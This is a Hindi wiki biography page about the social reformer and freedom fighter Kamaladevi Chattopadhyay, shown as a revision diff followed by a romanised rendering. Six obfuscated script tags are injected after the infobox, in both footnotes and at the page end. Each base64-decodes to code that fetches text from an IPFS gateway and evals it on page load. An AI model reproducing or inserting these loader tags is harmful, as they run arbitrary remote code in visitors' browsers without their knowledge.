Difference between revisions of "कमलादेवी चट्टोपाध्याय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by the same user not shown)
Line 29: Line 29:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=
+
|अन्य जानकारी=आजादी के बाद इन्हें वर्ष [[1952]] में ‘आल इंडिया हेंडीक्राफ्ट’ का प्रमुख नियुक्त किया गया। ग्रामीण इलाकों में इन्होंने घूम-घूम कर एक पारखी की तरह हस्तशिल्प और हथकरघा कलाओं का संग्रह किया।
 
|बाहरी कड़ियाँ=कमलादेवी ने [[भारत]] के स्वाधीनता संग्राम में हिस्सा लिया तथा अनेकों बार जेल गयी।  
 
|बाहरी कड़ियाँ=कमलादेवी ने [[भारत]] के स्वाधीनता संग्राम में हिस्सा लिया तथा अनेकों बार जेल गयी।  
|अद्यतन=
+
|अद्यतन={{अद्यतन|17:28, 22 दिसम्बर 2017 (IST)}}
 
}}
 
}}
'''कमलादेवी चट्टोपाध्याय''' ([[अंग्रेज़ी]]: ''Kamaladevi Chattopadhyay'', जन्म: [[3 अप्रैल]], [[1903]]; मृत्यु: [[29 अक्टूबर]], [[1988]]) [[भारत]] की समाज सुधारक, [[स्वतंत्रता संग्राम]] सेनानी, तथा भारतीय हस्तकला के क्षेत्र में नवजागरण लाने वाली गांधीवादी महिला थीं। उन्हे समाज सेवा के लिए [[1955]] में [[पद्म भूषण]] और सामुदायिक नेतृत्व के लिए सन [[1966]] में [[रेमन मैग्सेसे पुरस्कार]] से सम्मानित किया गया।
+
'''कमलादेवी चट्टोपाध्याय''' ([[अंग्रेज़ी]]: ''Kamaladevi Chattopadhyay'', जन्म: [[3 अप्रैल]], [[1903]]; मृत्यु: [[29 अक्टूबर]], [[1988]]) [[भारत]] की समाज सुधारक, [[स्वतंत्रता संग्राम]] सेनानी, तथा भारतीय हस्तकला के क्षेत्र में नवजागरण लाने वाली गाँधीवादी महिला थीं। उन्हे समाज सेवा के लिए [[1955]] में [[पद्म भूषण]] और सामुदायिक नेतृत्व के लिए सन [[1966]] में [[रेमन मैग्सेसे पुरस्कार]] से सम्मानित किया गया।
 
==जीवन परिचय==
 
==जीवन परिचय==
कमलादेवी चट्टोपाध्याय का जन्म [[कर्नाटक]] के एक सम्पन्न [[ब्राह्मण]] [[परिवार]], में 3 अप्रैल, सन् 1903 में हुआ था। उन्होंने [[मंगलोर]] तथा बाद में [[लन्दन]] के अर्थशास्त्र स्कूल से शिक्षा ग्रहण की। उनकी शादी अत्यन्त छोटी अवस्था में हो गयी तथा स्कूली शिक्षा के दौरान विधवा हो गयी थी। बाद में उन्होंने अपनी पसन्द के व्यक्ति हरिन चट्टोपाध्याय से वैवाहिक संबंध जोड़ दिया। कमलादेवी ने अपनी पति के साथ व्यापक रूप से यात्राएं की। वे एक सामाजिक कार्यकर्ता और कला और साहित्य की समर्थक थी।<ref>{{cite web |url=http://www.kranti1857.org/karnataka%20krantikari.php |title=कमलादेवी चट्टोपाध्याय |accessmonthday=17 सितम्बर |accessyear=2012 |last= |first= |authorlink= |format=पी.एच.पी |publisher=भारतकोश |language=हिन्दी }}  </ref>
+
कमलादेवी चट्टोपाध्याय का जन्म [[कर्नाटक]] के एक सम्पन्न [[ब्राह्मण]] [[परिवार]], में [[3 अप्रैल]], सन् 1903 में हुआ था। उन्होंने [[मंगलोर]] तथा बाद में [[लन्दन]] के अर्थशास्त्र स्कूल से शिक्षा ग्रहण की। उनकी शादी अत्यन्त छोटी अवस्था में हो गयी तथा स्कूली शिक्षा के दौरान विधवा हो गयी थी। बाद में उन्होंने अपनी पसन्द के व्यक्ति हरेन्द्रनाथ चट्टोपाध्याय से वैवाहिक संबंध जोड़ दिया। कमलादेवी ने अपनी पति के साथ व्यापक रूप से यात्राएं की। वे एक सामाजिक कार्यकर्ता और कला और साहित्य की समर्थक थी।<ref>{{cite web |url=http://www.kranti1857.org/karnataka%20krantikari.php |title=कमलादेवी चट्टोपाध्याय |accessmonthday=17 सितम्बर |accessyear=2012 |last= |first= |authorlink= |format=पी.एच.पी |publisher=भारतकोश |language=हिन्दी }}  </ref>
 +
==महिला आन्दोलन में योगदान==
 +
प्रकृति की दीवानी कमला देवी ने ‘ऑल इंडिया वीमेन्स कांफ्रेंस’ की स्थापना की। ये बहुत दिलेर थीं और पहली ऐसी भारतीय महिला थीं, जिन्होंने [[1920]] के दशक में खुले राजनीतिक चुनाव में खड़े होने का साहस जुटाया था, वह भी ऐसे समय में जब बहुसंख्यक भारतीय महिलाओं को आजादी शब्द का अर्थ भी नहीं मालूम था। ये [[गाँधी]] जी के ‘नमक आंदोलन’ (वर्ष 1930) और ‘असहयोग आंदोलन’ में हिस्सा लेने वाली महिलाओं में से एक थीं।
 +
नमक कानून तोड़ने के मामले में बांबे प्रेसीडेंसी में गिरफ्तार होने वाली वे पहली महिला थीं। स्वतंत्रता आंदोलन के दौरान वे चार बार जेल गईं और पांच साल तक सलाखों के पीछे रहीं।<ref name="aa">{{cite web |url=http://www.itshindi.com/kamladevi-chattopadhyay.html|title=कमलादेवी चट्टोपाध्याय |accessmonthday=22 दिसम्बर |accessyear=2017 |last= |first= |authorlink= |format=itshindi.com|publisher=|language=हिन्दी }}</ref>
 +
==हस्तशिल्प तथा हथकरघा कला को विकसित करने में योगदान==
 +
कमलादेवी चट्टोपाध्याय ने देश के विभिन्न हिस्सों में बिखरी समृद्ध हस्तशिल्प तथा हथकरघा कलाओं की खोज की दिशा में अद्भुत एवं सराहनीय कार्य किया। कमला चट्टोपाध्याय पहली भारतीय महिला थीं, जिन्होंने हथकरघा और हस्तशिल्प को न केवल राष्ट्रीय बल्कि अंतर्राष्ट्रीय स्तर पर पहचान दिलाई।
 +
 
 +
आजादी के बाद इन्हें वर्ष [[1952]] में ‘आल इंडिया हेंडीक्राफ्ट’ का प्रमुख नियुक्त किया गया। ग्रामीण इलाकों में इन्होंने घूम-घूम कर एक पारखी की तरह हस्तशिल्प और हथकरघा कलाओं का संग्रह किया। इन्होंने देश के बुनकरों के लिए जिस शिद्दत के साथ काम किया, उसका असर यह था कि जब ये गांवों में जाती थीं, तो हस्तशिल्पी, बुनकर, जुलाहे, सुनार अपने सिर से पगड़ी उतार कर इनके कदमों में रख देते थे। इसी समुदाय ने इनके अथक और निःस्वार्थ मां के समान सेवा की भावना से प्रेरित होकर इनको ‘हथकरघा मां’ का नाम दिया था।<ref name="aa"/>
 +
==देश के प्रमुख सांस्कृतिक और आर्थिक संस्थनों की स्थापना में योगदान==
 +
[[भारत]] में आज अनेक प्रमुख सांस्कृतिक संस्थान इनकी दूरदृष्टि और पक्के इरादे के परिणाम हैं. जिनमें प्रमुख हैं- नेशनल स्कूल ऑफ ड्रामा, संगीत नाटक अकेडमी, सेन्ट्रल कॉटेज इंडस्ट्रीज एम्पोरियम और क्राफ्ट कौंसिल ऑफ इंडिया। इन्होंने हस्तशिल्प और को-ओपरेटिव आंदोलनों को बढ़ावा देकर भारतीय जनता को सामाजिक और आर्थिक रूप से विकसित करने में अपना योगदान दिया। हालांकि इन कार्यों को करते समय इन्हें आजादी से पहले और बाद में सरकार से भी संघर्ष करना पड़ा।<ref name="aa"/>
 +
==पुस्तकें==
 +
कमलादेवी चट्टोपाध्याय ने ‘द अवेकिंग ऑफ इंडियन वोमेन’ वर्ष [[1939]], ‘जापान इट्स विकनेस एंड स्ट्रेन्थ’ वर्ष [[1943]], ‘अंकल सैम एम्पायर’ वर्ष [[1944]], ‘इन वार-टॉर्न चाइना’ वर्ष [[1944]] और ‘टुवर्ड्स ए नेशनल थिएटर’ नामक पुस्तकें भी लिखीं, जो बहुत चर्चित रहीं।<ref name="aa"/>
 
==व्यक्तित्व==
 
==व्यक्तित्व==
 
कमलादेवी चट्टोपाध्याय ब्राह्मण होते हुए समाजवादी थीं। बालिका वधू होते हुये वो स्त्री अधिकारवादी थीं। एक ऐसी राजनेता थीं जिन्हें कुर्सी की दरकार नहीं थी। एक ऐसी कुलीन वर्ग की महिला जिन्होंने लोक कलाओं को पुनर्जीवित किया। [[गांधीजी]] के नमक आंदोलन में गिरफ्तारी देने वाली पहली महिलाओं में से एक थीं कमलादेवी। विभाजन के बाद उन्होंने शरणार्थियों के पुनर्वास में अपने आप को झोंक दिया।
 
कमलादेवी चट्टोपाध्याय ब्राह्मण होते हुए समाजवादी थीं। बालिका वधू होते हुये वो स्त्री अधिकारवादी थीं। एक ऐसी राजनेता थीं जिन्हें कुर्सी की दरकार नहीं थी। एक ऐसी कुलीन वर्ग की महिला जिन्होंने लोक कलाओं को पुनर्जीवित किया। [[गांधीजी]] के नमक आंदोलन में गिरफ्तारी देने वाली पहली महिलाओं में से एक थीं कमलादेवी। विभाजन के बाद उन्होंने शरणार्थियों के पुनर्वास में अपने आप को झोंक दिया।
कमला देवी गांधी जी, [[जवाहर लाल नेहरू]], [[अबुलकलाम आज़ाद|मौलाना अबुल कलाम आज़ाद]], [[सरोजनी नायडू]] तथा [[कस्तूरबा गांधी]] से गहरे रूप से प्रभावित थी। उन्होंने स्वाधीनता संघर्ष में हिस्सा लिया तथा अनेकों बार जेल गयी।
+
[[कमला देवी]] [[गाँधी जी]], [[जवाहर लाल नेहरू]], [[अबुलकलाम आज़ाद|मौलाना अबुल कलाम आज़ाद]], [[सरोजनी नायडू]] तथा [[कस्तूरबा गांधी]] से गहरे रूप से प्रभावित थी। उन्होंने स्वाधीनता संघर्ष में हिस्सा लिया तथा अनेकों बार जेल गयी।
 
==सम्मान और पुरस्कार==
 
==सम्मान और पुरस्कार==
* [[पद्म भूषण]] ([[1955]])
+
*समाज सेवा के लिए [[भारत सरकार]] ने इन्हें नागरिक सम्मान ‘[[पद्म भूषण]]’ से वर्ष [[1955]] में सम्मानित किया।
* [[पद्म विभूषण]] ([[1987]])
+
*वर्ष [[1987]] में [[भारत सरकार]] ने अपने दूसरे सबसे बड़े नागरिक सम्मान ‘[[पद्म विभूषण]]’ से इन्हें सम्मानित किया।
* [[रेमन मैग्सेसे पुरस्कार]] ([[1988]])
+
*सामुदायिक नेतृत्व के लिए वर्ष [[1966]] में इन्हें ‘रेमन मैग्सेसे’ पुरस्कार से सम्मानित किया गया था।
* संगीत नाटक अकादमी फैलोशिप
+
*इन्हें [[संगीत नाटक अकादमी]] की द्वारा ‘फेलोशिप और रत्न सदस्य’ से सम्मानित किया गया।
* रत्न सदस्य
+
*संगीत नाटक अकादमी के द्वारा ही वर्ष 1974 में इन्हें ‘लाइफटाइम अचिवेमेंट’ पुरस्कार भी प्रदान किया गया था।
* [[संगीत नाटक अकादमी]] द्वारा लाइफ़ टाइम अचीवमेंट अवार्ड
+
*यूनेस्को ने इन्हें वर्ष [[1977]] में हेंडीक्राफ्ट को बढ़ावा देने के लिए सम्मानित किया था।
 +
*[[शान्ति निकेतन]] ने अपने सर्वोच्च सम्मान ‘देसिकोट्टम’ से सम्मानित किया।<ref name="aa"/>
 
==निधन==
 
==निधन==
 
कमला देवी [[भारत]] में नारी आन्दोलन की पथप्रदर्शक थी। सन् [[29 अक्टूबर]] [[1988]] में वे स्वर्गवासी हो गयी।
 
कमला देवी [[भारत]] में नारी आन्दोलन की पथप्रदर्शक थी। सन् [[29 अक्टूबर]] [[1988]] में वे स्वर्गवासी हो गयी।

Latest revision as of 11:58, 22 December 2017

kamaladevi chattopadhyay
poora nam kamaladevi chattopadhyay
janm 3 aprail, 1903
janm bhoomi mangalor, karnatak
mrityu 29 aktoobar, 1988
pati/patni krishnaa rav (19171919), harindranath chattopadhyay (19191988)
santan ramkrishna chattopadhyay
nagarikata bharatiy
prasiddhi samaj sudharak, svatantrata sangram senani
aandolan namak aandolan aur asahayog andolan
puraskar-upadhi padm bhooshan (1955), padm vibhooshan (1987), reman maigsese puraskar (1988)
any janakari ajadi ke bad inhean varsh 1952 mean ‘al iandiya heandikrapht’ ka pramukh niyukt kiya gaya. gramin ilakoan mean inhoanne ghoom-ghoom kar ek parakhi ki tarah hastashilp aur hathakaragha kalaoan ka sangrah kiya.
bahari k diyaan kamaladevi ne bharat ke svadhinata sangram mean hissa liya tatha anekoan bar jel gayi.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kamaladevi chattopadhyay (aangrezi: Kamaladevi Chattopadhyay, janm: 3 aprail, 1903; mrityu: 29 aktoobar, 1988) bharat ki samaj sudharak, svatantrata sangram senani, tatha bharatiy hastakala ke kshetr mean navajagaran lane vali gaandhivadi mahila thian. unhe samaj seva ke lie 1955 mean padm bhooshan aur samudayik netritv ke lie san 1966 mean reman maigsese puraskar se sammanit kiya gaya.

jivan parichay

kamaladevi chattopadhyay ka janm karnatak ke ek sampann brahman parivar, mean 3 aprail, sanh 1903 mean hua tha. unhoanne mangalor tatha bad mean landan ke arthashastr skool se shiksha grahan ki. unaki shadi atyant chhoti avastha mean ho gayi tatha skooli shiksha ke dauran vidhava ho gayi thi. bad mean unhoanne apani pasand ke vyakti harendranath chattopadhyay se vaivahik sanbandh jo d diya. kamaladevi ne apani pati ke sath vyapak roop se yatraean ki. ve ek samajik karyakarta aur kala aur sahity ki samarthak thi.[1]

mahila andolan mean yogadan

prakriti ki divani kamala devi ne ‘aaul iandiya vimens kaanphreans’ ki sthapana ki. ye bahut diler thian aur pahali aisi bharatiy mahila thian, jinhoanne 1920 ke dashak mean khule rajanitik chunav mean kh de hone ka sahas jutaya tha, vah bhi aise samay mean jab bahusankhyak bharatiy mahilaoan ko ajadi shabd ka arth bhi nahian maloom tha. ye gaandhi ji ke ‘namak aandolan’ (varsh 1930) aur ‘asahayog aandolan’ mean hissa lene vali mahilaoan mean se ek thian. namak kanoon to dane ke mamale mean baanbe presideansi mean giraphtar hone vali ve pahali mahila thian. svatantrata aandolan ke dauran ve char bar jel geean aur paanch sal tak salakhoan ke pichhe rahian.[2]

hastashilp tatha hathakaragha kala ko vikasit karane mean yogadan

kamaladevi chattopadhyay ne desh ke vibhinn hissoan mean bikhari samriddh hastashilp tatha hathakaragha kalaoan ki khoj ki disha mean adbhut evan sarahaniy kary kiya. kamala chattopadhyay pahali bharatiy mahila thian, jinhoanne hathakaragha aur hastashilp ko n keval rashtriy balki aantarrashtriy star par pahachan dilaee.

ajadi ke bad inhean varsh 1952 mean ‘al iandiya heandikrapht’ ka pramukh niyukt kiya gaya. gramin ilakoan mean inhoanne ghoom-ghoom kar ek parakhi ki tarah hastashilp aur hathakaragha kalaoan ka sangrah kiya. inhoanne desh ke bunakaroan ke lie jis shiddat ke sath kam kiya, usaka asar yah tha ki jab ye gaanvoan mean jati thian, to hastashilpi, bunakar, julahe, sunar apane sir se pag di utar kar inake kadamoan mean rakh dete the. isi samuday ne inake athak aur niahsvarth maan ke saman seva ki bhavana se prerit hokar inako ‘hathakaragha maan’ ka nam diya tha.[2]

desh ke pramukh saanskritik aur arthik sansthanoan ki sthapana mean yogadan

bharat mean aj anek pramukh saanskritik sansthan inaki dooradrishti aur pakke irade ke parinam haian. jinamean pramukh haian- neshanal skool aauph drama, sangit natak akedami, sentral k aautej iandastrij emporiyam aur krapht kauansil aauph iandiya. inhoanne hastashilp aur ko-oparetiv aandolanoan ko badhava dekar bharatiy janata ko samajik aur arthik roop se vikasit karane mean apana yogadan diya. halaanki in karyoan ko karate samay inhean ajadi se pahale aur bad mean sarakar se bhi sangharsh karana p da.[2]

pustakean

kamaladevi chattopadhyay ne ‘d avekiang aauph iandiyan vomen’ varsh 1939, ‘japan its vikanes eand strenth’ varsh 1943, ‘aankal saim empayar’ varsh 1944, ‘in var-t aaurn chaina’ varsh 1944 aur ‘tuvards e neshanal thietar’ namak pustakean bhi likhian, jo bahut charchit rahian.[2]

vyaktitv

kamaladevi chattopadhyay brahman hote hue samajavadi thian. balika vadhoo hote huye vo stri adhikaravadi thian. ek aisi rajaneta thian jinhean kursi ki darakar nahian thi. ek aisi kulin varg ki mahila jinhoanne lok kalaoan ko punarjivit kiya. gaandhiji ke namak aandolan mean giraphtari dene vali pahali mahilaoan mean se ek thian kamaladevi. vibhajan ke bad unhoanne sharanarthiyoan ke punarvas mean apane ap ko jhoank diya. kamala devi gaandhi ji, javahar lal neharoo, maulana abul kalam azad, sarojani nayadoo tatha kastooraba gaandhi se gahare roop se prabhavit thi. unhoanne svadhinata sangharsh mean hissa liya tatha anekoan bar jel gayi.

samman aur puraskar

  • samaj seva ke lie bharat sarakar ne inhean nagarik samman ‘padm bhooshan’ se varsh 1955 mean sammanit kiya.
  • varsh 1987 mean bharat sarakar ne apane doosare sabase b de nagarik samman ‘padm vibhooshan’ se inhean sammanit kiya.
  • samudayik netritv ke lie varsh 1966 mean inhean ‘reman maigsese’ puraskar se sammanit kiya gaya tha.
  • inhean sangit natak akadami ki dvara ‘pheloship aur ratn sadasy’ se sammanit kiya gaya.
  • sangit natak akadami ke dvara hi varsh 1974 mean inhean ‘laiphataim achivemeant’ puraskar bhi pradan kiya gaya tha.
  • yoonesko ne inhean varsh 1977 mean heandikrapht ko badhava dene ke lie sammanit kiya tha.
  • shanti niketan ne apane sarvochch samman ‘desikottam’ se sammanit kiya.[2]

nidhan

kamala devi bharat mean nari andolan ki pathapradarshak thi. sanh 29 aktoobar 1988 mean ve svargavasi ho gayi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. kamaladevi chattopadhyay (hindi) (pi.ech.pi) bharatakosh. abhigaman tithi: 17 sitambar, 2012.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. 2.0 2.1 2.2 2.3 2.4 kamaladevi chattopadhyay (hindi) (itshindi.com). . abhigaman tithi: 22 disambar, 2017.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>